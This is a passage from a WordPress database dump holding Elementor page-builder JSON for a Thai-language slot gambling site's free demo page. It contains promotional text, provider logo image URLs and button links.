\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1478,177,'_thumbnail_id','61'),(1482,178,'_elementor_edit_mode','builder'),(1483,178,'_elementor_template_type','wp-page'),(1484,178,'_elementor_version','3.32.5'),(1485,178,'_elementor_pro_version','3.32.3'),(1486,178,'_wp_page_template','default'),(1487,178,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1488,178,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 